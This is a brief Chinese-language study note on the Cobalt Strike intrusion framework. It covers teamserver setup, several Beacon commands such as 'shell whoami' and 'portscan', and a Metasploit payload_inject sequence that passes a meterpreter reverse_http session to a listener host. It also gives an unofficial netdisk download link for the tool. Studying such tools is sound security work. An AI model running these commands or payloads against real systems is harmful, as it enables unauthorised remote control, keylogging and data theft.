Cobalt Strike学习笔记

听过这个工具很久了,简称CS, 最近才开始真正了解.记录一次吧!因为是图形化界面,所以内容不多,多试试操作.

介绍及下载

内网渗透工具,分为服务端和客户端. 发现和msf差不多,生成木马,获取反弹shell,执行命令,进行屏幕监控或者键盘记录等.可以与msf进行联动,互相传shell

download
来源:百度网盘 | 提取码:80wi

环境搭建

  1. 启动服务端
    ./teamserver 192.168.79.131 admin
  2. 启动客户端
    ./cobaltstrike

简单使用

  1. 创建一个监听器
  2. 生成一个木马命令或文件

常用Beacon命令

sleep 3
shell whoami
net view
portscan

与MSF联动

  1. msf传session到CS
    use exploit/windows/local/payload_inject
    set payload windows/meterpreter/reverse_http
    set lhost 192.168.79.131
    set lport 3333
    set DisablePayloadHandler True
    set PrependMigrate True
    set session 1
    run

 

THE END